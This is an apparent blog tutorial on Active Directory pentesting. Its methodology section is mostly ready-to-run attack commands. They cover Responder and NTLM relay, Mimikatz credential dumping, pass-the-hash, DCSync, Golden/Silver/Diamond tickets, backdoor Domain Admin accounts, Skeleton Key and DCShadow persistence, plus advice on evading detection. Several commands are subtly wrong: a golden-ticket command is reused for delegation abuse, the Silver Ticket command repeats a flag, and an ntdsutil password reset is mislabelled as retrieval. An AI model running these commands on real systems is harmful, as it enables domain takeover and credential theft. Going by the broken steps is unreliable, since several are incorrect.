Active Directory Methodology in Pentesting: A Comprehensive Guide

In today’s digital landscape, Active Directory (AD) serves as the backbone for managing network resources in most enterprise environments. AD simplifies the administration of complex IT systems by providing a centralized and organized structure for managing users, computers, and other resources. Given its critical role, ensuring the security of Active Directory is paramount. This article will delve into the intricacies of Active Directory and outline a comprehensive methodology for pentesting AD environments. Whether you’re a beginner or an intermediate cybersecurity professional, this guide will equip you with the knowledge and tools to effectively pentest Active Directory, identify vulnerabilities, and enhance the overall security posture of an organization.

Photo by Towfiqu barbhuiya on Unsplash

Understanding Active Directory

Key Concepts

1. Directories: A directory is a hierarchical structure that stores information about objects within a network. In AD, this directory is used to store data about users, computers, and other resources.
2. Objects: Objects represent the various entities within AD. Common objects include users, groups, computers, and printers. Each object has attributes, such as a user’s name, email, and password.
3. Domains: A domain is a logical group of objects that share the same AD database. It acts as a security boundary and allows for centralized management of these objects.
4. Trees: A tree is a collection of one or more domains that are linked together in a hierarchical structure. Domains within a tree share a contiguous namespace.
5. Forests: A forest is the top-level container in AD and consists of one or more trees. Trees in a forest share a common global catalog, directory schema, and configuration.

Active Directory Domain Services (AD DS)

AD DS is the core service provided by Active Directory, encompassing several important functionalities:

• Domain Services: Provides authentication, authorization, and directory services.
• Certificate Services: Issues and manages digital certificates for secure communication.
• Lightweight Directory Services: Offers a simplified version of AD DS for applications that do not require the full functionality.
• Directory Federation Services: Enables single sign-on (SSO) capabilities across organizational boundaries.
• Rights Management: Protects sensitive data through encryption and policy enforcement.
• DNS Service: Integrates with AD to provide name resolution services.

Pentesting Active Directory: Methodology and Techniques

Reconnaissance Without Credentials or Sessions

Before diving into the core pentesting activities, understanding the environment through passive reconnaissance is crucial. Tools like Nmap can be used to scan for open ports and services. Additionally, NetBIOS and DNS enumeration can provide valuable insights into the AD structure and available hosts.

Commands:

nmap -sP <target_network_range>
nmap -p 88,135,139,389,445,636,3268,3269,3389 -sV -O <target_ip>
nbtscan <target_network_range>
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>

• Nmap
• nbtscan

User Enumeration

User enumeration can be achieved using tools like ldapsearch or enum4linux. These tools exploit LDAP and SMB protocols to gather information about users and groups.

Commands:

ldapsearch -x -h <domain_controller_ip> -b "dc=example,dc=com" "(objectclass=user)"
enum4linux -U <target_ip>

• ldapsearch
• enum4linux

LLMNR/NBT-NS Poisoning

LLMNR and NBT-NS poisoning are techniques used to capture and relay authentication requests. Tools like Responder can be employed to listen for these requests and capture hashes, which can then be used for further attacks.

Commands:

sudo responder -I <network_interface>

• Responder

NTLM Relay

NTLM relay attacks involve capturing NTLM hashes and relaying them to another service to gain unauthorized access. NTLMRelayX is a powerful tool for performing such attacks.

Commands:

sudo ntlmrelayx.py -tf targets.txt -smb2support

• NTLMRelayX

Credential Theft

Credential theft can be performed using tools like Mimikatz to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.

Commands:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

• Mimikatz

Enumerating Active Directory with Credentials or Sessions

Once credentials are obtained, tools like BloodHound can be used to map out the AD environment, identifying relationships and potential attack paths.

Commands:

SharpHound.exe -c All

• BloodHound

Kerberoasting

Kerberoasting involves requesting service tickets for SPNs (Service Principal Names) and then cracking the tickets offline to obtain plaintext passwords. Tools like Rubeus are commonly used for this technique.

Commands:

Rubeus.exe kerberoast

• Rubeus

Remote Connections (RDP, SSH, FTP, Win-RM)

Exploiting remote connections involves using tools like Metasploit or Cobalt Strike to gain access through services like RDP, SSH, FTP, and Win-RM.

Commands:

msfconsole
use exploit/windows/rdp/rdp_login
set RHOSTS <target_ip>
set USERNAME <username>
set PASSWORD <password>
run

• Metasploit

Current Session Tickets

Analyzing current session tickets can help identify active sessions that can be hijacked or abused for lateral movement.

Commands:

klist sessions

Looking for Credentials in Computer Shares

Scanning shared folders for stored credentials can uncover plaintext passwords or scripts containing sensitive information. Tools like SharpHound can automate this process.

Commands:

SharpHound.exe -c Shares

• SharpHound

Specific Exploits

CVE-2021–1675 (PrintNightmare)

PrintNightmare is an exploit that leverages vulnerabilities in the Print Spooler service. Tools like PrintNightmare exploit this to gain elevated privileges.

Commands:

PrintNightmare.exe <target_ip>

• PrintNightmare

CVE-2021–34527 (PrintNightmare)

This is another variant of the PrintNightmare vulnerability. Proper patch management and disabling the Print Spooler service on critical servers can mitigate this risk.

Commands:

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

Step-by-Step Guides for Key Pentesting Techniques

Privilege Escalation on Active Directory with Privileged Credentials/Session

1. Identify vulnerable paths using tools like BloodHound.

SharpHound.exe -c All

2. Exploit the path by performing techniques like token impersonation or service abuse.

mimikatz.exe "privilege::debug" "token::elevate" "exit"

3. Verify access by attempting to access restricted resources.

dir \\<target_ip>\c$
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

3. Execute the command sekurlsa::logonpasswords to extract hashes.

• Store the hashes securely for further use.

Pass the Hash

1. Obtain the NTLM hash of the target account.
2. Use the hash with tools like Mimikatz or Pass-the-Hash Toolkit to authenticate without the plaintext password.

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:cmd.exe" "exit"

Over Pass the Hash/Pass the Key

1. Extract the Kerberos key using tools like Mimikatz.

mimikatz.exe "privilege::debug" "sekurlsa::ekeys" "exit"

2. Use the key to request a Kerberos ticket and authenticate.

mimikatz.exe "kerberos::ptt <ticket.kirbi>"

Pass the Ticket

1. Extract the Kerberos ticket using Mimikatz.

mimikatz.exe "kerberos::list" "kerberos::ptt <ticket.kirbi>" "exit"

2. Inject the ticket into the current session using Mimikatz.

Credentials Reuse

1. Identify reused credentials across different services.
2. Authenticate using the obtained credentials on other services.

MSSQL Abuse & Trusted Links

1. Identify MSSQL servers within the network.

sqlcmd -L

2. Exploit trusted links to execute commands or retrieve data.

sqlcmd -S <target_server> -U <username> -P <password>

Unconstrained Delegation

1. Identify accounts with unconstrained delegation.

Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

2. Abuse the delegation by impersonating the account.

mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain_sid> /target:<target_service> /rc4:<service_account_hash> /user:<target_user> /service:<service_name> /target:<target_fqdn>" "exit"

Constrained Delegation

1. Identify services allowed to delegate.

Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne $null} -Properties msDS-AllowedToDelegateTo

Exploit the delegation by compromising the service account.

Resource-based Constrained Delegation

1. Identify resource-based delegation settings.

Get-ADComputer -Filter {msDS-AllowedToActOnBehalfOfOtherIdentity -ne $null} -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

2. Exploit the settings to gain elevated access.

ACLs Abuse

1. Enumerate ACLs using tools like BloodHound.

SharpHound.exe -c All

2. Modify ACLs to grant additional permissions.

Invoke-ACLpwn -Domain <domain> -Principal <user> -AddFullControl

Printer Spooler Service Abuse

1. Exploit the Print Spooler service using known vulnerabilities.
2. Gain elevated privileges by exploiting the service.

PrintNightmare.exe <target_ip>

Third-Party Sessions Abuse

1. Identify active third-party sessions.

klist sessions

2. Hijack the sessions to gain unauthorized access.

LAPS

1. Retrieve LAPS passwords stored in AD.

Get-ADComputer -Filter * -Property "ms-MCS-AdmPwd" | Select-Object Name, "ms-MCS-AdmPwd"

2. Use the passwords to gain access to local administrator accounts.

Certificate Theft

1. Identify certificates stored in AD.

certutil -store -user My

2. Extract the certificates using tools like Certify.

Certify.exe find /type:domain

Certificate Templates Abuse

1. Enumerate certificate templates.

certutil -TCAInfo

2. Abuse misconfigured templates to obtain elevated privileges.

Certify.exe request /ca:<CA Name> /template:<Template Name>

Post-Exploitation with High Privilege Account

1. Dump domain credentials using tools like DCSync.

mimikatz.exe "lsadump::dcsync /domain:<domain> /user:<user>" "exit"

2. Escalate privileges by creating new accounts or modifying group memberships.

net user <username> <password> /add
net group "Domain Admins" <username> /add

Dumping Domain Credentials

1. Run DCSync using Mimikatz.

mimikatz.exe "lsadump::dcsync /domain:<domain> /user:<user>" "exit"

2. Store the dumped credentials securely.

Privilege Escalation as Persistence

1. Maintain access by creating backdoor accounts.

net user <username> <password> /add

2. Ensure persistence by modifying security descriptors.

Set-ACL -Path "AD:<path>" -ACLObject $acl

Silver Ticket

1. Create a Silver Ticket using the service account hash.

mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain_sid> /target:<target_service> /rc4:<service_account_hash> /user:<target_user> /service:<service_name> /target:<target_fqdn>" "exit"

2. Authenticate to the service without communicating with the DC.

Golden Ticket

1. Extract the KRBTGT account hash.

mimikatz.exe "lsadump::dcsync /domain:<domain> /user:krbtgt" "exit"

2. Create a Golden Ticket to gain domain admin privileges.

mimikatz.exe "kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /id:<user_id> /groups:<group_ids>" "exit"

Diamond Ticket

1. Craft a Diamond Ticket with special privileges.

mimikatz.exe "kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /id:<user_id> /groups:<group_ids> /extra:<extra_privileges>" "exit"

2. Use the ticket for specific operations within the network.

Certificates Account Persistence

1. Abuse certificate templates to maintain persistence.

Certify.exe request /ca:<CA Name> /template:<Template Name>

2. Ensure continued access by re-issuing certificates.

Certify.exe renew /id:<cert_id>

Certificates Domain Persistence

1. Modify domain certificates to maintain elevated access.
2. Ensure persistent access by renewing certificates periodically.

Certify.exe renew /id:<cert_id>

AdminSDHolder Group

1. Modify AdminSDHolder group settings.

Set-ADObject -Identity "CN=AdminSDHolder,CN=System,DC=<domain>,DC=com" -Replace @{adminCount=1}

2. Maintain elevated privileges by ensuring changes propagate.

Set-ADUser -Identity <username> -Replace @{adminCount=1}

DSRM Credentials

1. Retrieve DSRM credentials from the domain controller.

ntdsutil "set dsrm password" "reset password on server <server_name>" "quit"

2. Use the credentials to access the DC in Directory Services Restore Mode.

ACL Persistence

1. Modify ACLs to maintain access.

Invoke-ACLpwn -Domain <domain> -Principal <user> -AddFullControl

2. Ensure persistence by securing changes against removal.

Security Descriptors

1. Analyze security descriptors for misconfigurations.

Get-ACL -Path "AD:<path>"

2. Exploit the misconfigurations to escalate privileges.

Set-ACL -Path "AD:<path>" -ACLObject $acl

Skeleton Key

1. Deploy a Skeleton Key on the domain controller.

mimikatz.exe "privilege::debug" "misc::skeleton" "exit"

2. Use the master password to authenticate any account.

Custom SSP

1. Install a custom Security Support Provider.
2. Use the SSP to capture or manipulate authentication processes.

DCShadow

1. Register a rogue DC using DCShadow.

mimikatz.exe "privilege::debug" "lsadump::dcshadow /push" "exit"

2. Push changes to the AD database to manipulate objects and permissions.

mimikatz.exe "privilege::debug" "lsadump::dcshadow /update" "exit"

LAPS Persistence

1. Utilize LAPS settings to maintain access.

Get-ADComputer -Filter * -Property "ms-MCS-AdmPwd" | Select-Object Name, "ms-MCS-AdmPwd"

2. Ensure persistence by periodically updating and retrieving passwords.

Forest Privilege Escalation — Domain Trusts

1. Identify inter-domain trusts.

Get-ADTrust -Filter *

Exploit trust relationships to escalate privileges across the forest.

Tips for Beginners

Common Mistakes to Avoid

• Skipping Reconnaissance: Thorough recon is crucial for understanding the environment.
• Ignoring Patch Management: Ensure the environment is up-to-date with patches.
• Overlooking Privilege Escalation Paths: Use tools like BloodHound to identify and exploit all possible paths.

Challenges and Solutions

• Complexity of AD Environments: Break down the environment into smaller segments and analyze each thoroughly.
• Detection by Security Systems: Use stealthy techniques and tools that minimize detection.
• Lack of Documentation: Document each step meticulously to understand the process and findings better.

Pentesting Active Directory is a multifaceted task that requires a deep understanding of AD structures and services, as well as a methodical approach to identifying and exploiting vulnerabilities. By following the comprehensive methodology outlined in this article, you can systematically uncover weaknesses, elevate privileges, and ultimately enhance the security of AD environments. As you gain experience, continue to refine your techniques and stay abreast of new vulnerabilities and exploitation methods. Pentesting AD is not just about finding flaws but also about contributing to the security and resilience of the IT infrastructure.

Ensuring the security of Active Directory is critical for the overall security of an organization’s IT environment. By conducting thorough pentests and addressing identified vulnerabilities, organizations can protect their valuable assets and maintain a robust security posture.

The Ultimate Active Directory Mastery Bundle - 2 Ebooks

📎 Buy me a Coffee